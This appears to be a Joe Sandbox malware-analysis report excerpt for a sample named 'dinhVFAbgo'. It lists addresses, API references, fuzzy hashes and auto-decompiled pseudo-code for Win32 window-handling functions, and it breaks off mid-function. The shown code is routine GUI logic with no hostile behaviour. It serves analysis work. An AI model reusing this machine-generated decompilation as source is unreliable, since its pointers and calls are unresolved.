0x00cee98c
0x00cee998
0x00cee9a0
0x00cee9a2
0x00cee9aa
0x00cee9b0
0x00cee9b5
0x00cee9ef
0x00ceea09
0x00ceea0f
0x00ceeb38
0x00ceeb3d
0x00ceeb47
0x00ceeb4f
0x00ceeb5d
0x00ceeb63
0x00ceeb64
0x00000000
0x00ceeb64
0x00ceea17
0x00ceea28
0x00ceea2e
0x00ceea3a
0x00ceea3c
0x00ceea3f
0x00ceea44
0x00ceea47
0x00ceea4c
0x00ceea7a
0x00ceea7d
0x00ceea82
0x00ceea92
0x00ceea9c
0x00ceeab2
0x00ceeaba
0x00ceeac2
0x00ceeac5
0x00ceeac8
0x00ceeacb
0x00ceeace
0x00ceeadc
0x00ceeaf0
0x00ceeaf2
0x00ceeaf5
0x00ceeaf8
0x00ceeafd
0x00ceeaff
0x00ceeb01
0x00ceeb01
0x00ceeb06
0x00ceeb08
0x00ceeb0a
0x00ceeb0a
0x00ceeb0d
0x00ceeb12
0x00ceeb25
0x00ceeb28
0x00ceeb2e
0x00ceeb2e
0x00000000
0x00ceea82
0x00ceea4e
0x00ceea54
0x00ceea61
0x00ceea6d
0x00ceea70
0x00000000
0x00000000
0x00ceea72
0x00ceea75
0x00000000
0x00000000
0x00000000
0x00ceea75
0x00ceea77
0x00000000
0x00000000
0x00000000
0x00000000
0x00cee9b7
0x00cee9b7
0x00cee9bb
0x00cee9c6
0x00cee9ca
0x00000000
0x00000000
0x00cee9d0
0x00cee9e4
0x00cee9e4
0x00cee9df
0x00cee9e1
0x00cee9e1
0x00cee9ea
0x00cee9ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00cee9ed
0x00000000
0x00cee9b7

APIs

GetParent.USER32(00000000), ref: 00CEE9F2
SendMessageA.USER32(?,0000040C,00000000,00000000), ref: 00CEEA2E
SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 00CEEA61
SetRectEmpty.USER32(?), ref: 00CEEACE
SendMessageA.USER32(00000000,00000406,00000000,?), ref: 00CEEB2E
RedrawWindow.USER32(00000000,00000000,00000000,00000505), ref: 00CEEB5D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$EmptyParentRectRedrawWindow
String ID:
API String ID: 3879113052-0
Opcode ID: da66049dc6915db71db0886212a3a4a8098d8aa34d87a2d7a108b4fefc9ac643
Instruction ID: 5c54d6968f20dd21eebe6c91b58e751bde6b0816c746b1002fee69aa1758e76a
Opcode Fuzzy Hash: da66049dc6915db71db0886212a3a4a8098d8aa34d87a2d7a108b4fefc9ac643
Instruction Fuzzy Hash: 64616A71A002199FDB28CFA9C995BAEBBF5FF48740F10416EE516A7391DB706A00CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00D88EA3 Relevance: 9.2, APIs: 6, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00D88EA3(intOrPtr* __ecx, void* __edx, void* __eflags, struct tagPOINT _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				signed int _v60;
				intOrPtr* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t57;
				void* _t61;
				void* _t64;
				void* _t67;
				signed int _t89;
				int _t93;
				void* _t96;
				intOrPtr* _t99;
				intOrPtr* _t119;
				signed int _t127;

				_t118 = __edx;
				_t57 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t57 ^ _t127;
				_t119 = __ecx;
				_v64 = __ecx;
				 *0xe17a64();
				_t61 =  *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x1b8))))();
				_t98 = _t61;
				 *0xe17a64();
				_t64 = E00D537D5(0xe6872c, __edx,  *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x19c))))());
				_v60 = _v60 | 0xffffffff;
				if(_t61 < 0) {
					_t130 = _t64;
					if(_t64 != 0) {
						_t96 = E00D38BF0(_t98, _t64, _t119, 0, _t130);
						if(_t96 != 0 &&  *((intOrPtr*)(_t96 + 8)) != 0 &&  *((intOrPtr*)(_t96 + 4)) != 0) {
							_v60 =  *((intOrPtr*)(_t96 + 0x110));
						}
					}
				}
				 *0xe17a64(_a4.x, _a8, 1);
				_t67 =  *((intOrPtr*)( *((intOrPtr*)( *_t119 + 0x334))))();
				_t99 = _v64;
				_t120 = _t67;
				_v40.left = 0;
				_v40.top = 0;
				_v40.right = 0;
				_v40.bottom = 0;
				_v56.left = 0;
				_t125 =  *((intOrPtr*)( *_t99 + 0x32c));
				_v56.top = 0;
				_v56.right = 0;
				_v56.bottom = 0;
				 *0xe17a64( &_v40,  &_v56);
				 *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x32c))))();
				if(_t67 == 2) {
					L15:
					_push(3);
					L16:
					_pop(0);
					L17:
					return E00DDCBCE(0, _t99, _v8 ^ _t127, _t118, _t120, _t125);
				}
				_push(_a8);
				if(PtInRect( &_v40, _a4.x) != 0) {
					goto L15;
				}
				_push(_a8);
				if(PtInRect( &_v56, _a4.x) != 0 || _v60 == 8) {
					goto L15;
				} else {
					_v24.left = 0;
					_v24.top = 0;
					_v24.right = 0;
					_v24.bottom = 0;
					GetWindowRect( *(_t99 + 0x20),  &_v24);
					_t125 =  *((intOrPtr*)( *_t99 + 0x1a4));
					 *0xe17a64();
					_v24.top =  *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x1a4))))() + _v24.top - _v40.top + _v40.bottom;
					_v24.bottom = _v24.bottom + _v56.top - _v56.bottom;
					_t89 = _a12;
					if(_t89 != 0xffffffff) {
						InflateRect( &_v24,  ~_t89,  ~_t89);
						_push(_a8);
						_t93 = PtInRect( &_v24, _a4.x);
						__eflags = _t93;
						if(_t93 != 0) {
							L12:
							goto L17;
						}
						L14:
						_push(2);
						goto L16;
					}
					_push(_a8);
					if(PtInRect( &_v24, _a4) != 0) {
						goto L14;
					}
					goto L12;
				}
			}

0x00d88ea3
0x00d88ea9
0x00d88eb0
0x00d88eb6
0x00d88eb8
0x00d88ec5
0x00d88ecd
0x00d88ed1
0x00d88edb
0x00d88eeb
0x00d88ef0
0x00d88ef8
0x00d88efa
0x00d88efc
0x00d88f00
0x00d88f07
0x00d88f19
0x00d88f19
0x00d88f07
0x00d88efc
0x00d88f2e
0x00d88f36
0x00d88f38
0x00d88f3b
0x00d88f3f
0x00d88f42
0x00d88f47
0x00d88f4a
0x00d88f4d
0x00d88f50
0x00d88f58
0x00d88f5b
0x00d88f5e
0x00d88f69
0x00d88f71
0x00d88f76
0x00d89040
0x00d89040
0x00d89042
0x00d89042
0x00d89043
0x00d89051
0x00d89051
0x00d88f7c
0x00d88f8e
0x00000000
0x00000000
0x00d88f94
0x00d88fa6
0x00000000
0x00d88fb6
0x00d88fbf
0x00d88fc2
0x00d88fc5
0x00d88fc8
0x00d88fcb
0x00d88fd3
0x00d88fdb
0x00d88fee
0x00d88ff7
0x00d88ffa
0x00d89000
0x00d89022
0x00d89028
0x00d89032
0x00d89038
0x00d8903a
0x00d89016
0x00000000
0x00d89016
0x00d8903c
0x00d8903c
0x00000000
0x00d8903c
0x00d89002
0x00d89014
0x00000000
0x00000000
0x00000000
0x00d89014

APIs

PtInRect.USER32(?,?,?), ref: 00D88F86
PtInRect.USER32(?,?,?), ref: 00D88F9E
GetWindowRect.USER32 ref: 00D88FCB
PtInRect.USER32(?,?,?), ref: 00D8900C
InflateRect.USER32(?,?,?), ref: 00D89022
PtInRect.USER32(?,?,?), ref: 00D89032

Part of subcall function 00D38BF0: __EH_prolog3.LIBCMT ref: 00D38BF7

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$H_prolog3InflateWindow
String ID:
API String ID: 1292614506-0
Opcode ID: cc55a1fbecd6e23dcceda68018c1425cae601be356dc948aaf8b8e34fdb59a55
Instruction ID: bf1b7089be1d183bdb6941aa9a0a2e0c28ecb8a8b4ea05142898b5e107a10136
Opcode Fuzzy Hash: cc55a1fbecd6e23dcceda68018c1425cae601be356dc948aaf8b8e34fdb59a55
Instruction Fuzzy Hash: 4E515D71A00219AFCF11DFA9C994AEEBBFAEF08750F14406AF905E7250DB349A04DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00CE648C Relevance: 9.1, APIs: 6, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00CE648C(int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, struct tagRECT _a12, struct HBRUSH__* _a16, struct HBRUSH__* _a20, struct HBRUSH__* _a24) {
				signed int _v8;
				struct tagRECT _v24;
				struct HBRUSH__* _v28;
				struct HBRUSH__* _v32;
				struct tagPOINT _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				int _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t52;
				intOrPtr _t55;
				struct HBRUSH__* _t60;
				struct HBRUSH__* _t61;
				intOrPtr _t65;
				struct HBRUSH__* _t66;
				void* _t82;
				intOrPtr* _t84;
				void* _t86;
				struct HBRUSH__* _t99;
				signed int _t101;

				_t98 = __edx;
				_t52 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t52 ^ _t101;
				_t84 = _a8;
				_t100 = _a4;
				_t99 = 0;
				_v52 = __ecx;
				_v48 = _t100;
				if( *((intOrPtr*)(__ecx + 0xc)) != 0) {
					_t55 = E00CD8851(__edx, _t84);
					_v44 = _t55;
					_pop(_t86);
					if(_t55 == 0 ||  *(_t55 + 0x20) == 0) {
						_t55 = E00CB277F(_t84, _t86, _t98, GetParent( *(_t84 + 0x20)));
						_v44 = _t55;
					}
					_v24.left = _t99;
					_v24.top = _t99;
					_v24.right = _t99;
					_v24.bottom = _t99;
					GetWindowRect( *(_t55 + 0x20),  &_v24);
					E00CBA172(_t84,  &_v24);
					_t60 = _v24.right;
					if(_a20 <= _t60) {
						_a20 = _t60;
					}
					_t61 = _v24.bottom;
					if(_a24 <= _t61) {
						_a24 = _t61;
					}
					_t100 =  *((intOrPtr*)( *_t84 + 0x170));
					 *0xe17a64();
					if( *((intOrPtr*)( *((intOrPtr*)( *_t84 + 0x170))))() != 0) {
						L18:
						_t65 = _v48;
						if(_t65 != 0) {
							_t66 =  *(_t65 + 4);
						} else {
							_t66 = _t99;
						}
						_t67 = _v52;
						__imp__DrawThemeBackground( *((intOrPtr*)(_v52 + 0xc)), _t66, _t99, _t99,  &_a12, _t99);
						L22:
						return E00DDCBCE(_t67, _t84, _v8 ^ _t101, _t98, _t99, _t100);
					} else {
						_t100 =  *((intOrPtr*)( *_t84 + 0x228));
						 *0xe17a64(_t99);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t84 + 0x228))))() != 0) {
							goto L18;
						}
						_a12.left = _v24.left;
						_a16 = _v24.top;
						if(E00CACB0B(_t84, 0xe2b238) != 0) {
							goto L18;
						}
						_t100 =  *0xe885fc; // 0x0
						if(_t100 != 0) {
							L16:
							if( *(_t100 + 0x20) != _t99) {
								_v40.x = _t99;
								_v40.y = _t99;
								_v32 = _t99;
								_v28 = _t99;
								GetClientRect( *(_t100 + 0x20),  &_v40);
								MapWindowPoints( *(_t100 + 0x20),  *(_t84 + 0x20),  &_v40, 2);
								_a16 = _v40.y;
							}
							goto L18;
						}
						_t100 = E00CB2BE8(_v44, _t100);
						if(_t100 == 0) {
							goto L18;
						}
						goto L16;
					}
				}
				_t82 = E00CC19ED() + 0xd0;
				if(_t82 != 0) {
					_t99 =  *(_t82 + 4);
				}
				_t67 = FillRect( *(_t100 + 4),  &_a12, _t99);
				goto L22;
			}

0x00ce648c
0x00ce6492
0x00ce6499
0x00ce649d
0x00ce64a3
0x00ce64a7
0x00ce64a9
0x00ce64ac
0x00ce64b2
0x00ce64d7
0x00ce64dc
0x00ce64df
0x00ce64e2
0x00ce64f3
0x00ce64f8
0x00ce64f8
0x00ce64fe
0x00ce6502
0x00ce6505
0x00ce6508
0x00ce650e
0x00ce651a
0x00ce651f
0x00ce6525
0x00ce6527
0x00ce6527
0x00ce652a
0x00ce6530
0x00ce6532
0x00ce6532
0x00ce6537
0x00ce653f
0x00ce654b
0x00ce65d4
0x00ce65d4
0x00ce65d9
0x00ce65df
0x00ce65db
0x00ce65db
0x00ce65db
0x00ce65ea
0x00ce65f0
0x00ce65f6
0x00ce6604
0x00ce6551
0x00ce6554
0x00ce655c
0x00ce6568
0x00000000
0x00000000
0x00ce656f
0x00ce657a
0x00ce6584
0x00000000
0x00000000
0x00ce6586
0x00ce658e
0x00ce659e
0x00ce65a1
0x00ce65a6
0x00ce65ad
0x00ce65b0
0x00ce65b3
0x00ce65b6
0x00ce65c8
0x00ce65d1
0x00ce65d1
0x00000000
0x00ce65a1
0x00ce6598
0x00ce659c
0x00000000
0x00000000
0x00000000
0x00ce659c
0x00ce654b
0x00ce64b9
0x00ce64be
0x00ce64c0
0x00ce64c0
0x00ce64cb
0x00000000

APIs

FillRect.USER32 ref: 00CE64CB
GetParent.USER32(?), ref: 00CE64EC
GetWindowRect.USER32 ref: 00CE650E
GetClientRect.USER32(?,?), ref: 00CE65B6
MapWindowPoints.USER32 ref: 00CE65C8
DrawThemeBackground.UXTHEME(?,?,00000000,00000000,?,00000000), ref: 00CE65F0

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Window$BackgroundClientDrawFillParentPointsTheme
String ID:
API String ID: 2136005349-0
Opcode ID: f172800cef2d571d32b6f19c2f63698c750fe452b24fc2317f15129c06223b11
Instruction ID: bb0e772e1ec689dc2ace06eb0efcc2f4bc862d90bcdca1715aa2fdaf22d22efc
Opcode Fuzzy Hash: f172800cef2d571d32b6f19c2f63698c750fe452b24fc2317f15129c06223b11
Instruction Fuzzy Hash: 265155B1A102199FCB10DFAAC9449AEBBF8FF58740B10416AE815A7260DB30DE00CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CC934A Relevance: 9.1, APIs: 6, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00CC934A(void* __ebx, struct tagRECT* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct tagRECT* _t94;
				signed int _t98;
				intOrPtr* _t102;
				void* _t110;
				intOrPtr _t118;
				void* _t121;
				void* _t122;
				void* _t124;

				_t124 = __eflags;
				_t111 = __edi;
				_t110 = __edx;
				E00DDD55F(0xe0955c, __ebx, __edi, __esi);
				_t94 = __ecx;
				 *((intOrPtr*)(_t121 - 0x44)) = __ecx;
				E00CB236A(__ecx, __ecx, _t124, 0x54);
				_t116 = 0;
				_t125 =  *((intOrPtr*)(_t94 + 0xc0));
				if( *((intOrPtr*)(_t94 + 0xc0)) != 0) {
					E00CB90E5(_t94, _t121 - 0x60, _t110, __edi, 0, _t125);
					 *((intOrPtr*)(_t121 - 4)) = 0;
					 *(_t121 - 0x20) = 0;
					 *(_t121 - 0x1c) = 0;
					 *((intOrPtr*)(_t121 - 0x18)) = 0;
					 *((intOrPtr*)(_t121 - 0x14)) = 0;
					GetWindowRect( *(_t94 + 0x20), _t121 - 0x20);
					_t94 = _t94 + 0x94;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t118 =  *((intOrPtr*)(_t121 - 0x44));
					 *(_t121 - 0x30) = 0;
					 *((intOrPtr*)(_t121 - 0x2c)) = 0;
					 *((intOrPtr*)(_t121 - 0x28)) = 0;
					_t94->left =  *((intOrPtr*)(_t118 + 0x9c)) -  *((intOrPtr*)(_t118 + 0x80));
					 *((intOrPtr*)(_t121 - 0x24)) = 0;
					GetClientRect( *(_t118 + 0x20), _t121 - 0x30);
					E00CB9BF2(_t118, _t121 - 0x30);
					OffsetRect(_t94,  *((intOrPtr*)(_t118 + 0x80)) -  *((intOrPtr*)(_t121 - 0x18)) +  *((intOrPtr*)(_t121 - 0x28)), 0);
					_t98 =  *(_t121 - 0x1c);
					 *((intOrPtr*)(_t118 + 0x98)) =  *((intOrPtr*)(_t118 + 0x98)) +  *((intOrPtr*)(_t121 - 0x2c)) - _t98;
					 *((intOrPtr*)(_t118 + 0xa0)) =  *((intOrPtr*)(_t118 + 0xa0)) +  *((intOrPtr*)(_t121 - 0x24)) -  *((intOrPtr*)(_t121 - 0x14));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect(_t121 - 0x40,  ~( *(_t121 - 0x20)),  ~_t98);
					 *(_t121 - 0x48) =  *(_t121 - 0x48) & 0x00000000;
					 *((intOrPtr*)(_t121 - 0x4c)) = 0xe1a644;
					 *((char*)(_t121 - 4)) = 1;
					E00CB9BC6(_t94, _t121 - 0x4c, _t121 - 0x40, CreateRectRgnIndirect(_t121 - 0x40));
					E00CBA1B1(_t121 - 0x60, _t121 - 0x4c);
					_t102 =  *((intOrPtr*)(_t121 - 0x44));
					_t111 = _t122 - 0x10;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t116 =  *((intOrPtr*)( *_t102 + 0x168));
					 *0xe17a64(_t121 - 0x60,  *((intOrPtr*)(_t102 + 0x84)),  *((intOrPtr*)(_t102 + 0x88)), _t94);
					 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 0x168))))();
					E00CBA1B1(_t121 - 0x60, 0);
					E00CBA172( *((intOrPtr*)(_t121 - 0x44)), _t94);
					 *((intOrPtr*)(_t121 - 0x4c)) = 0xe1a644;
					E00CB91F0(_t121 - 0x4c, _t110);
					E00CB9360(_t121 - 0x60);
				}
				return E00DDD50E(_t94, _t111, _t116);
			}

0x00cc934a
0x00cc934a
0x00cc934a
0x00cc9351
0x00cc9356
0x00cc9358
0x00cc935b
0x00cc9360
0x00cc9362
0x00cc9368
0x00cc9372
0x00cc937a
0x00cc9381
0x00cc9384
0x00cc9387
0x00cc938a
0x00cc938d
0x00cc9393
0x00cc939e
0x00cc939f
0x00cc93a0
0x00cc93a1
0x00cc93a2
0x00cc93a7
0x00cc93aa
0x00cc93ad
0x00cc93bc
0x00cc93c5
0x00cc93c8
0x00cc93d4
0x00cc93e8
0x00cc93f4
0x00cc93f9
0x00cc9407
0x00cc9415
0x00cc941b
0x00cc941c
0x00cc941d
0x00cc941e
0x00cc9424
0x00cc9428
0x00cc9432
0x00cc9441
0x00cc944d
0x00cc9452
0x00cc946c
0x00cc946f
0x00cc9470
0x00cc9471
0x00cc9472
0x00cc9473
0x00cc947b
0x00cc9484
0x00cc948b
0x00cc9494
0x00cc949c
0x00cc94a3
0x00cc94ab
0x00cc94ab
0x00cc94b5

APIs

__EH_prolog3_GS.LIBCMT ref: 00CC9351

Part of subcall function 00CB90E5: __EH_prolog3.LIBCMT ref: 00CB90EC
Part of subcall function 00CB90E5: GetWindowDC.USER32(00000000,00000004,00CD9743,00000000), ref: 00CB9118

GetWindowRect.USER32 ref: 00CC938D
GetClientRect.USER32(?,?), ref: 00CC93C8

Part of subcall function 00CB9BF2: ClientToScreen.USER32(?,?), ref: 00CB9C01
Part of subcall function 00CB9BF2: ClientToScreen.USER32(?,?), ref: 00CB9C0E

OffsetRect.USER32(?,?,00000000), ref: 00CC93E8
OffsetRect.USER32(?,?,?), ref: 00CC941E
CreateRectRgnIndirect.GDI32(?), ref: 00CC9437

Part of subcall function 00CBA1B1: SelectClipRgn.GDI32(?,00000000), ref: 00CBA1D5
Part of subcall function 00CBA1B1: SelectClipRgn.GDI32(?,00000000), ref: 00CBA1ED

Part of subcall function 00CBA172: ScreenToClient.USER32 ref: 00CBA181
Part of subcall function 00CBA172: ScreenToClient.USER32 ref: 00CBA18E

Part of subcall function 00CB9360: ReleaseDC.USER32 ref: 00CB9394

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ClientRect$Screen$ClipOffsetSelectWindow$CreateH_prolog3H_prolog3_IndirectRelease
String ID:
API String ID: 2381714760-0
Opcode ID: d6cdc29a350225b54dc7611f48cd8fdd6f1437f636e05a5ee26fdc4138f95dd5
Instruction ID: dbc7025ffe4a0e0369c2c60dc97132119159a771dba088014136d46d3ddf0965
Opcode Fuzzy Hash: d6cdc29a350225b54dc7611f48cd8fdd6f1437f636e05a5ee26fdc4138f95dd5
Instruction Fuzzy Hash: A341E471D00619DFCF01DFA9C889AEEBBBAFF09300F144119E956BB251CB756A06CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00D00C11 Relevance: 9.1, APIs: 6, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00D00C11(void* __ecx, void* __edx, intOrPtr* _a8) {
				struct tagPOINT _v12;
				struct tagRECT _v28;
				signed int _v32;
				struct tagPOINT _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t32;
				signed int _t35;
				signed int _t44;
				signed int _t45;
				signed int _t47;
				intOrPtr _t51;
				signed int _t52;
				void* _t54;
				void* _t55;
				signed int _t63;
				struct HWND__* _t65;
				void* _t69;
				void* _t72;
				void* _t73;
				intOrPtr* _t76;
				struct HWND__* _t77;
				signed int _t80;
				signed int _t81;

				_t69 = __edx;
				_t59 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t76 = _a8;
				_t71 = __ecx;
				if(_t76 == 0) {
					E00CAA4E7(_t54, __ecx, __ecx, _t76, __eflags);
					asm("int3");
					_t80 = _t81;
					_t32 =  *0xe68dd4; // 0x8d2643c2
					_v28.left = _t32 ^ _t80;
					_t35 = 1;
					_push(__ecx);
					_t72 = __ecx;
					__eflags = _v12.x - 1;
					if(_v12.x == 1) {
						_push(_t54);
						_push(_t76);
						_t77 = 0;
						_v40.x = 0;
						_v40.y = 0;
						GetCursorPos( &_v40);
						_t55 = E00CB277F(_t54, _t59, _t69, GetParent( *(_t72 + 0x20)));
						_v28.left = 0;
						_v28.top = 0;
						_v28.right = 0;
						_v28.bottom = 0;
						GetWindowRect( *(_t55 + 0x20),  &_v28);
						_push(_v40.y);
						_t44 = PtInRect( &_v28, _v40);
						__eflags = _t44;
						_t63 = 0 | _t44 == 0x00000000;
						_v32 = _t63;
						__eflags = _t44;
						if(_t44 == 0) {
							_t45 = E00CACB0B(_t55, 0xe68440);
							_t65 =  *(_t55 + 0x20);
							__eflags = _t45;
							if(_t45 == 0) {
								_t47 = E00CB277F(_t55, _t65, _t69, GetParent(_t65));
								__eflags = _t47;
								if(_t47 != 0) {
									_t77 =  *(_t47 + 0x20);
								}
								 *(_t72 + 0x1dcc) = _t77;
							} else {
								 *(_t72 + 0x1dcc) = _t65;
							}
							_t63 = _v32;
						}
						_pop(_t76);
						_t35 = _t63;
						_pop(_t54);
					}
					__eflags = _v12.x ^ _t80;
					_pop(_t73);
					return E00DDCBCE(_t35, _t54, _v12.x ^ _t80, _t69, _t73, _t76);
				} else {
					_push(_t54);
					_v12.x = 0;
					_v12.y = 0;
					GetCursorPos( &_v12);
					 *_t76 = 0;
					_t51 = E00CACA6C(0xe68440, E00CE16DE(_t71, _v12.x, _v12.y, 0, 0, 0xe68440));
					if(_t51 == 0) {
						_t52 = 0;
						__eflags = 0;
					} else {
						 *_t76 = _t51;
						_t52 = 1;
					}
					return _t52;
				}
			}

0x00d00c11
0x00d00c11
0x00d00c14
0x00d00c15
0x00d00c17
0x00d00c1b
0x00d00c1f
0x00d00c6a
0x00d00c6f
0x00d00c71
0x00d00c76
0x00d00c7d
0x00d00c82
0x00d00c83
0x00d00c84
0x00d00c86
0x00d00c89
0x00d00c8f
0x00d00c90
0x00d00c94
0x00d00c97
0x00d00c9a
0x00d00c9d
0x00d00cb2
0x00d00cb4
0x00d00cba
0x00d00cbe
0x00d00cc1
0x00d00cc7
0x00d00ccd
0x00d00cd7
0x00d00cdf
0x00d00ce1
0x00d00ce4
0x00d00ce7
0x00d00ce9
0x00d00cf2
0x00d00cf7
0x00d00cfa
0x00d00cfc
0x00d00d0e
0x00d00d13
0x00d00d15
0x00d00d17
0x00d00d17
0x00d00d1a
0x00d00cfe
0x00d00cfe
0x00d00cfe
0x00d00d20
0x00d00d20
0x00d00d23
0x00d00d24
0x00d00d26
0x00d00d26
0x00d00d2a
0x00d00d2c
0x00d00d33
0x00d00c21
0x00d00c21
0x00d00c28
0x00d00c2b
0x00d00c2e
0x00d00c34
0x00d00c4f
0x00d00c59
0x00d00c62
0x00d00c62
0x00d00c5b
0x00d00c5b
0x00d00c5f
0x00d00c5f
0x00d00c67
0x00d00c67

APIs

GetCursorPos.USER32(?), ref: 00D00C2E
GetCursorPos.USER32(?), ref: 00D00C9D
GetParent.USER32(?), ref: 00D00CA6
GetWindowRect.USER32 ref: 00D00CC7
PtInRect.USER32(?,?,?), ref: 00D00CD7
GetParent.USER32(?), ref: 00D00D07

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CursorParentRect$Window
String ID:
API String ID: 499013921-0
Opcode ID: d93c4f2be5ecfdf3f473ce3b486d39361337ce9ba02423ca7dcd28afc8895a54
Instruction ID: 20c15c4963262f3227a78e65a80b4743f308483e9a7cfeb4871d62640ccae58d
Opcode Fuzzy Hash: d93c4f2be5ecfdf3f473ce3b486d39361337ce9ba02423ca7dcd28afc8895a54
Instruction Fuzzy Hash: 6D318FB2A1021AAFDB149FA5DD85AEEBBBDFF18710F10402AF445E3250DB709900CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00CB51D0 Relevance: 9.1, APIs: 6, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00CB51D0(intOrPtr __ecx, int _a4, int _a8, RECT* _a12, RECT* _a16) {
				signed int _v8;
				struct tagRECT _v24;
				RECT* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				RECT* _t46;
				int _t47;
				RECT* _t55;
				intOrPtr* _t56;
				struct HWND__* _t57;
				signed int _t59;

				_t30 =  *0xe68dd4; // 0x8d2643c2
